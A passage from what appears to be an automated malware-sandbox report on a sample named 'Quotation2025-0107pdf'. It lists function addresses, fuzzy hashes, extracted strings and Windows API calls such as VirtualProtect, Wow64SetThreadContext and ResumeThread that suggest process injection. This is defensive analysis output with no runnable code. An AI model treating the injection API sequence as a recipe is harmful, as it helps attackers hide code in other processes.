Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 6d8df2e872ab1e95031eecd8c5ef439b168d32c1b4650b98869a323e82199e96
Instruction ID: 26ce947677b7c408122a66f1870ee262eeb1f8183a1fe0e4af38abd167ac3164
Opcode Fuzzy Hash: 6d8df2e872ab1e95031eecd8c5ef439b168d32c1b4650b98869a323e82199e96
Instruction Fuzzy Hash: 5E413AB9911309CFCB14DF99C488AABBBF5FF88314F25C459E519A7321D774A841CBA0

Function 018C8468 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 018C850F

Memory Dump Source

Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 54fdf368e8e2ed5b2730b0d393e3e0e8643f79c7a36d3979964bb1b408a8942a
Instruction ID: 1201035360ba0382778648ce391516720b58c9bb6814cc68dc7c88b00289609d
Opcode Fuzzy Hash: 54fdf368e8e2ed5b2730b0d393e3e0e8643f79c7a36d3979964bb1b408a8942a
Instruction Fuzzy Hash: 4A3199B9D002589FCB10CFA9D884ADEFBF1BB19310F14902AE814B7350D775AA45CF64

Function 0A1BD970 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0A1BDA1F

Memory Dump Source

Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: d5c68c798f470b3ac2d029fa86d2b112b5f76771c0b7748dc70ce6a2e97761f8
Instruction ID: 16313003e2276651d8ea943dd7a308a07d3db88bad14e42cd3e352f46a34f785
Opcode Fuzzy Hash: d5c68c798f470b3ac2d029fa86d2b112b5f76771c0b7748dc70ce6a2e97761f8
Instruction Fuzzy Hash: 1C31CBB4D112589FCB14CFAAD884AEEFBF1BF49310F24802AE419B7240D778A945CF54

Function 12511BF9 Relevance: 1.6, APIs: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 12511C9B

Memory Dump Source

Source File: 00000000.00000002.1726298566.0000000012510000.00000040.00000800.00020000.00000000.sdmp, Offset: 12510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12510000_Quotation2025-0107pdf.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 37f8a82899f47696e2ec62f054a97e8188ecfa41e85854e376512b87a0cbe454
Instruction ID: 44f5d380ec66a4c2c6c11417c32345a31b0556d136a00b2229342ee2657d1454
Opcode Fuzzy Hash: 37f8a82899f47696e2ec62f054a97e8188ecfa41e85854e376512b87a0cbe454
Instruction Fuzzy Hash: CB3198B9D05248AFCB10CFA9E580ADEFBF1AB49314F14906AE819BB310C735A945CF64

Function 12511C00 Relevance: 1.6, APIs: 1, Instructions: 85windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 12511C9B

Memory Dump Source

Source File: 00000000.00000002.1726298566.0000000012510000.00000040.00000800.00020000.00000000.sdmp, Offset: 12510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12510000_Quotation2025-0107pdf.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: c7316d7ff4d7701f2d5e58ef7834fc63a3449d0ec7fa1cdf3f0742e987c23f70
Instruction ID: 1429912e125eecd80c22a2fbebc0652fa336d133650249d4fcfeeeaca0c99097
Opcode Fuzzy Hash: c7316d7ff4d7701f2d5e58ef7834fc63a3449d0ec7fa1cdf3f0742e987c23f70
Instruction Fuzzy Hash: 193198B9D042589FCB10CFA9E584ADEFBF5AB09310F10906AE818BB310D375A945CF64

Function 018C9EA0 Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

OutputDebugStringW.KERNELBASE(?), ref: 018CA852

Memory Dump Source

Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: d58d89530e423fe4a90159823497e13d7e3e54d0e0f7ecd01e9c9519e6737814
Instruction ID: ab3303b97f31ee306cb9992c8f88138c86278ced53a531bf4cd6f1da0206a019
Opcode Fuzzy Hash: d58d89530e423fe4a90159823497e13d7e3e54d0e0f7ecd01e9c9519e6737814
Instruction Fuzzy Hash: 0C31BAB4D0024C9FCB14CFAAD484ADEFBF1AB48314F14902AE818B7360D734A945CFA4

Function 03056440 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(?), ref: 030564D2

Memory Dump Source

Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 2d5127234b3ab738363d64caf133ed75b25a3939f3b557e80030d2cdc365f023
Instruction ID: 13476c04446c10a517136ff8f01ecb651886055ec57a9e5be2a80f2aa738952e
Opcode Fuzzy Hash: 2d5127234b3ab738363d64caf133ed75b25a3939f3b557e80030d2cdc365f023
Instruction Fuzzy Hash: 0731A7B4D0125C9FCB14CFAAD984ADEFBF5AB49310F14906AE818B7320D335A945CFA4

Function 0A1BD440 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0A1BD4C6

Memory Dump Source

Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 482ece4d21c1a5b91dc604a337c07683f7a4ac721abe666721f7a9dfc1703d0e
Instruction ID: e3f0123d8ccce0ee35a1937bd1ec1765d855d8969e3f67b974ab27cb7827f84a
Opcode Fuzzy Hash: 482ece4d21c1a5b91dc604a337c07683f7a4ac721abe666721f7a9dfc1703d0e
Instruction Fuzzy Hash: 0631ADB4D112589FCB14CFAAE585AEEFBF1AF49310F24942AE419B7340C735A941CF54

Function 0A1BD448 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0A1BD4C6

Memory Dump Source

Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 30283ba49f4f25ca729c3c25860455d3f4438f70cf065640c27f819c8dff4b45
Instruction ID: b4b1a977b22ec03c5e62fb93dbfb6e8220a09b7d133d398f996f313daf15caa6
Opcode Fuzzy Hash: 30283ba49f4f25ca729c3c25860455d3f4438f70cf065640c27f819c8dff4b45
Instruction Fuzzy Hash: 8631AAB4D112189FCB14CFAAE985ADEFBF5AF49310F14942AE819B7340C735A941CF68

Function 018C9EAC Relevance: 1.3, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 018CA92E

Memory Dump Source

Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: b269788125a36e20d3b5042965da671c13485c12336c91b85e4ac0c7832858ab
Instruction ID: 947bde71f449c24741f7570d8fdf1bc7b44a9ca88cdbb62815674cfe8a4b82ce
Opcode Fuzzy Hash: b269788125a36e20d3b5042965da671c13485c12336c91b85e4ac0c7832858ab
Instruction Fuzzy Hash: 8D31CCB8D0021C9FCB14CFA9E484AEEFBF4AB09310F10905AE914B3350D334AA45CFA4

Function 0127D3EC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709856378.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_127d000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f73406fec12281ada8109e8aa163e9df27e9c277ef6fe06cfc43e2f2cde17d7
Instruction ID: 4bab86ce08ecca4b14d78674806a8232dd89df2b5c66484569607c6d81ed24bb
Opcode Fuzzy Hash: 6f73406fec12281ada8109e8aa163e9df27e9c277ef6fe06cfc43e2f2cde17d7
Instruction Fuzzy Hash: CA2128B1514209EFDB05DF58D9D0B67BF65FF94320F24C569D9090B246C336E416C7A1

Function 0128D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710099897.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_128d000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57194276ae5eb94bd88c99b32501c17cd5a7568f081af4097c628a4c31378416
Instruction ID: 01ca15f78de72cd237323b4ba73deae5e777039d2bf535d96444ba0d7634475b
Opcode Fuzzy Hash: 57194276ae5eb94bd88c99b32501c17cd5a7568f081af4097c628a4c31378416
Instruction Fuzzy Hash: 29210375614208DFDB15EF58D884B16BBA5EB84314F24C96DD90A4B3C2C376D40BCA61

Function 0128D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710099897.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_128d000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b35b14d1b2b9ce7bc62956dda91cb99d8e434153e1a7c460e1006976dac9900a
Instruction ID: 26ebff9cf6b3da27f11fa41384dde8eeb6ba08a8eda1229ff0c388834a9dcd9a
Opcode Fuzzy Hash: b35b14d1b2b9ce7bc62956dda91cb99d8e434153e1a7c460e1006976dac9900a
Instruction Fuzzy Hash: 50212871514208DFDB01EF98D5C0B15BBA5FB84324F20C66DD9094B2C7C376D80ACB61

Function 0127D3E7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709856378.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_127d000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
Instruction ID: 636c61ae1afea69d974045f76632770e11ebdf343d0768083e6c792952d06ba5
Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
Instruction Fuzzy Hash: 4B11EE76504284CFCB02CF44D9C4B56BF72FF84320F24C6A9DA090B656C33AE45ACBA2

Function 0128D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710099897.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_128d000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction ID: d04463f98f42a84acda8252119ff1ec639ee11617c6beeeefeff2b1907759715
Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction Fuzzy Hash: 2111BB75944284DFDB02EF58C5C4B15BBB2FB84324F24C6ADD9494B29BC33AD41ACB61

Function 0128D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710099897.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_128d000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction ID: d8d62270be2d8cc665372f1c604c77657a3f1fbf3abea972a46f7333d8e11c25
Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction Fuzzy Hash: 0F11BB75504284CFDB12DF58D5C4B15BBA2FB84324F24C6AAD94A4B696C33AD40BCBA2

Non-executed Functions

Function 0A084D38 Relevance: 6.9, Strings: 5, Instructions: 621COMMON

Download Yara Rule

Strings

Hbq, xrefs: 0A087BC3
Hbq, xrefs: 0A0879F4
Hbq, xrefs: 0A087B05
Hbq, xrefs: 0A087961
Hbq, xrefs: 0A087A7B

Memory Dump Source

Source File: 00000000.00000002.1723179639.000000000A080000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a080000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID: Hbq$Hbq$Hbq$Hbq$Hbq
API String ID: 0-1677660839
Opcode ID: f6cc4949f81c8bab550794a18baa5eb32e3756bdc72083835d5e3b4b53d06133
Instruction ID: 19b6307a0e4a70a1fced9cd6efc2e2cdf7ecbbae07499ef40e63d565c22c6452
Opcode Fuzzy Hash: f6cc4949f81c8bab550794a18baa5eb32e3756bdc72083835d5e3b4b53d06133
Instruction Fuzzy Hash: D1326F70E002588FDB54EF78C8907AEBBF2BF84300F258569D489AB399DB349D45CB95

Function 0A1B0720 Relevance: 4.0, Strings: 3, Instructions: 239COMMON

Download Yara Rule

Strings

TJcq, xrefs: 0A1B08D6
Te^q, xrefs: 0A1B0F87
xbaq, xrefs: 0A1B0860

Memory Dump Source

Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID: TJcq$Te^q$xbaq
API String ID: 0-3225726259
Opcode ID: 1a3498496ec72d24960dd959c5c4382d70990dda8b9514ff0d0493fa971fe3bf
Instruction ID: 57b32da62f1caf07531181050dd05d11f87a8bffec8e4e7f381d2dee0c5eec6c
Opcode Fuzzy Hash: 1a3498496ec72d24960dd959c5c4382d70990dda8b9514ff0d0493fa971fe3bf
Instruction Fuzzy Hash: FBC16375E006688FDB68DF6AC9446DDBBF2BF88301F14C1AAD409AB365DB305A85CF50

Function 018C5BD0 Relevance: 3.9, Strings: 3, Instructions: 118COMMON

Download Yara Rule

Strings

-=J, xrefs: 018C5CD8
nM$s, xrefs: 018C5CBE
2ii@, xrefs: 018C5C87

Memory Dump Source

Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID: -=J$2ii@$nM$s
API String ID: 0-2111338200
Opcode ID: 60cbaa1cbfe5c03d6c2218cbba6ee221c61b9afd37bfdb7af969a3bd1f2bfbae
Instruction ID: ba81dce0cfb6816f1659ef7572db5dbb5048300acd9178fac9a3c02dabf68198
Opcode Fuzzy Hash: 60cbaa1cbfe5c03d6c2218cbba6ee221c61b9afd37bfdb7af969a3bd1f2bfbae
Instruction Fuzzy Hash: 2F411AB4E0520EDBCF04CFA9C5845AEFBB2AF89300F24D56AC415EB214E734AB41CB91

Function 018C5BE0 Relevance: 3.9, Strings: 3, Instructions: 114COMMON

Download Yara Rule

Strings

-=J, xrefs: 018C5CD8
nM$s, xrefs: 018C5CBE
2ii@, xrefs: 018C5C87

Memory Dump Source

Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID: -=J$2ii@$nM$s
API String ID: 0-2111338200
Opcode ID: e975ff48ad0aba9f9f7784d60690d62bf1c98bc1bf03ae101d6c1123ed93f216
Instruction ID: c81731443f1ecfe4acf6a560f590847e4c56ca39b1471f67030065bed9c4355b
Opcode Fuzzy Hash: e975ff48ad0aba9f9f7784d60690d62bf1c98bc1bf03ae101d6c1123ed93f216
Instruction Fuzzy Hash: 9441F7B4E0520EDBCF04CFA9C5845AEFBB2AF88300F24D569C515F7214E734AA428F94

Function 018C1728 Relevance: 2.8, Strings: 2, Instructions: 253COMMON

Download Yara Rule

Strings

b[, xrefs: 018C1A8E
b[, xrefs: 018C1A95

Memory Dump Source

Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID: b[$b[
API String ID: 0-2917807350
Opcode ID: af2e370096e6eef6f97163b968d11b1bb12c88da451a8d8a719d57dddcc2fc6c
Instruction ID: 370a3037e0cdabba737668751b934b106a06d17c97284442f56f6f3da13ab23a
Opcode Fuzzy Hash: af2e370096e6eef6f97163b968d11b1bb12c88da451a8d8a719d57dddcc2fc6c
Instruction Fuzzy Hash: E2B1FF74E1121ACFDB44DFA8D884ADEBBB2FF88301F108659D419AB359DB34A945CF90

Function 0A1B0428 Relevance: 1.4, Strings: 1, Instructions: 168COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0A1B051A

Memory Dump Source

Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 66478b753e3d8aac74c1db2bedee00ed6f5f73091a7201516669c1c548acedbd
Instruction ID: 46978f09ad8141fc0b4b102d57cad8d1cce3c906ba6de33779e0a82b7f9f755f
Opcode Fuzzy Hash: 66478b753e3d8aac74c1db2bedee00ed6f5f73091a7201516669c1c548acedbd
Instruction Fuzzy Hash: A77118B1E042598FDB58DF6EE8406AABBF2FB98300F04C469D0099B264EB345907CF81

Function 0A1B0448 Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0A1B051A

Memory Dump Source

Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: d6ee26970437c0d072c979f536e075df5f696b20193c48bc70b328428b03b8b2
Instruction ID: e0aa46d67eee575626a33d6d0af715508b28306eddd16eb852d82f3c3dcc25e2
Opcode Fuzzy Hash: d6ee26970437c0d072c979f536e075df5f696b20193c48bc70b328428b03b8b2
Instruction Fuzzy Hash: EA611BB1E042598FDB58DF7EE8406AABBF6FB98300F04C569D0099B264EB745907CF81

Function 018C56D0 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

5N9!, xrefs: 018C5732

Memory Dump Source

Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID: 5N9!
API String ID: 0-3730369185
Opcode ID: 9160fce5fc68a446a8eebd8f816a48e2aff961ff046a9498b5b2e57ec342cde6
Instruction ID: 6c8c2cb5541be7b0fbb8776b53868441d3a6c78748f3d2dd1bd520ddb3b88a27
Opcode Fuzzy Hash: 9160fce5fc68a446a8eebd8f816a48e2aff961ff046a9498b5b2e57ec342cde6
Instruction Fuzzy Hash: 6B4119B4E0560ADFCF04CFAAC5415AEFBF2EB89304F24D46AC416E7254E734AA418F94

Function 018C3A8A Relevance: 1.4, Strings: 1, Instructions: 118COMMON

Download Yara Rule

Strings

kK)R, xrefs: 018C3BAE

Memory Dump Source

Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID: kK)R
API String ID: 0-1888444940
Opcode ID: 1ce7760262b6977dce343ed821eb74cc8cbe9a883d5d356278917b99747017a0
Instruction ID: 860692db4f5b90b4821aa0a8b13e2fb61fc9714b8c97292a979d2395d1dfa8e8
Opcode Fuzzy Hash: 1ce7760262b6977dce343ed821eb74cc8cbe9a883d5d356278917b99747017a0
Instruction Fuzzy Hash: CE411374E0961A9FCB04CFA9C8409AEFBF1BF89320F14D56AD815E7364D7309A52CB91

Function 018C56E0 Relevance: 1.4, Strings: 1, Instructions: 113COMMON

Download Yara Rule

Strings

5N9!, xrefs: 018C5732

Memory Dump Source

Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID: 5N9!
API String ID: 0-3730369185
Opcode ID: 18761265d8375420bc782aab365fd66230f9ea89d1c026db923800d679bc7b91
Instruction ID: 59cce7d5a8778b89173643216884b2a00b27f90e3645d59c62f1cbbc5951a0ec
Opcode Fuzzy Hash: 18761265d8375420bc782aab365fd66230f9ea89d1c026db923800d679bc7b91
Instruction Fuzzy Hash: BF41D7B4E0460ADFCF04CFAAD5415AEFBF2BB88304F24D46AD515E7214D734AA418F94

Function 0305B208 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 509c6ca2b441653189676f0884009970a261ee209c376ae5706d83b35c78b164
Instruction ID: 9624ebc9e0aff12bd6eb8cfcbc41bb458195672013eb8eb7901d827f4e8d80fe
Opcode Fuzzy Hash: 509c6ca2b441653189676f0884009970a261ee209c376ae5706d83b35c78b164
Instruction Fuzzy Hash: 5812E2F14127468BEB28EF25ED4828D3BA5B746328F944209C2A51B2DDD7FD154ACF88

Function 0A1BCB50 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55e35b21e3546c7665a41ab366d1351dca2e12bb40f3e2643bd974629a398e81
Instruction ID: 06ce9a46013081b46ba50612272acd0816343a5a1e940e1c590df93bec66d3fb
Opcode Fuzzy Hash: 55e35b21e3546c7665a41ab366d1351dca2e12bb40f3e2643bd974629a398e81
Instruction Fuzzy Hash: A1E1EAB4E101198FCB14DFA9C5909AEFBB2FF89304F258169D418AB355D731AD82CFA1

Function 0A1BB8B0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8a51ee5051a51cd845b769f54ff2ab48abdf0828a0a6bed5100eab4e3a2296f
Instruction ID: 6406a9567ddd084fea44bc5ad1feb4d433fab51e6cf82274c45cad4f1c0f32bf
Opcode Fuzzy Hash: b8a51ee5051a51cd845b769f54ff2ab48abdf0828a0a6bed5100eab4e3a2296f
Instruction Fuzzy Hash: 92E11AB4E141198FCB14DFA9C5909AEFBB2FF89304F248169D414AB755DB30AD82CFA0

Function 0A1BB040 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 849a5e32ca6a3d6675bec6a8ca3047a31ce2343c3811b6f785640b2ddc8d0c62
Instruction ID: ab2f045db0de4351ca6bfd63fa5550b70520afd49e9cf8ec33ae886eaefc952d
Opcode Fuzzy Hash: 849a5e32ca6a3d6675bec6a8ca3047a31ce2343c3811b6f785640b2ddc8d0c62
Instruction Fuzzy Hash: 36E11A74E141198FCB14DFA9C5909AEFBB2FF89304F248169D418AB755DB30AD82CF60

Function 0A1BB478 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be82ed3f8b8ba445ee46bbcd78ba7870349043e3d6af7824254b9ad7b99c14cc
Instruction ID: e63bd0feab16e5a8d136eb9bbf464c5e2cf7a1e437e987b7cdbd7c77beb69da6
Opcode Fuzzy Hash: be82ed3f8b8ba445ee46bbcd78ba7870349043e3d6af7824254b9ad7b99c14cc
Instruction Fuzzy Hash: 96E119B4E141198FCB14DFA9C5909AEFBB2FF89304F248169D418AB755DB30AD82CF61

Function 0A1BD538 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f732717bd6bf5d1ebcaca562f783600c9a1240cae8df0cb1f2ba5cb004cd1b8
Instruction ID: 8569b7560febd9fa4833af85c8d32874b4aff43f7a47de7524777011f46cf054
Opcode Fuzzy Hash: 3f732717bd6bf5d1ebcaca562f783600c9a1240cae8df0cb1f2ba5cb004cd1b8
Instruction Fuzzy Hash: F2E10974E102198FCB14DFA9D5909AEFBB2FF89304F258169D418AB355DB30AD82CF61

Function 0A087394 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1723179639.000000000A080000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a080000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 246faceb73172c9b9602e08b5340da267e16025391f0b06abfc126079a56c823
Instruction ID: 905e2099ef8d31ff8036a41468996d3100bbec48fec10d3ab809b4dd89f9c565
Opcode Fuzzy Hash: 246faceb73172c9b9602e08b5340da267e16025391f0b06abfc126079a56c823
Instruction Fuzzy Hash: C3C16FB0E002199FCB55EF65C88079DBBF2BF84300F15C1AAD489AB259DB70D985CF95

Function 030591EC Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a57981d465422721cca3c486791650ba81912bab41e700ad0a1b384f800a699f
Instruction ID: fb29389d415c457afd83d722cf38f0ca46a558afd6d74008e2c7b08aa8635492
Opcode Fuzzy Hash: a57981d465422721cca3c486791650ba81912bab41e700ad0a1b384f800a699f
